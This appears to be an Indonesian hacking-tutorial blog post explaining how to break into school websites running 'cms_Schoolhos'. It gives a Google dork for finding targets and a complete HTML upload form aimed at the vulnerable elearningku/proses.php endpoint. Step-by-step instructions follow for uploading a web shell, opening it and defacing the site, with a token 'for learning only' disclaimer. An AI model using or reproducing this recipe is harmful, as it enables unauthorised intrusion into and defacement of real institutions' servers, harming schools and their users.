CSRF cms_Schoolhos
Langsung saja kita mulai Tutorialnya
Upss.., sebelum itu kita siapkan alat tempurnya, apa saja alat tempurnya ?!
- Shell Backdoor ( Saya rasa udah punya sendiri sendiri )
- Script Deface ( Saya rasa udah punya sendiri sendiri )
- Dork :
inurl:/?p=berita ( Kembangkan dorknya )
-CSRF :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tatsumi Crew</title>
</head>
<body>
<form method="POST" action="site.com/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
<input type="file" name="fupload">
<input type="submit" class="tombol" value="Upload">
</form>
</body>
</html>
Note: Yang warna merah ganti menjadi site target kalian.
Langusung saja :
1. Dorking dulu di google ( Berdoa saja semoga dapat yang vuln )
2. Jika sudah masukkan exploitnya seperti ini
contoh
site.com/[PATCH]/elearningku/proses.php
Jika ada blank atau putih berarti vuln selanjutnya
3. Masukkan link beserta exploit tadi ke dalam CSRF
4. Dan save CSRF dengan format .html
contoh : CSRF.html
5. Buka CSRF tersebut menggunakan browser kalian
6. Upload shell kalian
7. Akses shell ?!
site.com/file/materi/namashell.php
Sekianlah Postingan Dari All Tutor Cyber tentang "CSRF cms_Schoolhos" Semoga Bisa Bermanfaat!
Anda Sekarang Sedang Membaca Postingan "CSRF cms_Schoolhos" Dengan URL https://www.alltutorcyber.me/2018/07/csrf-cmsschoolhos.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.
Tutorial di website ini hanya untuk pembelajaraan. Kami selaku admin All Tutor Cyber tidak bertanggung jawab atas penyalagunaan ilmu.
brp nomor wa bang
ReplyDelete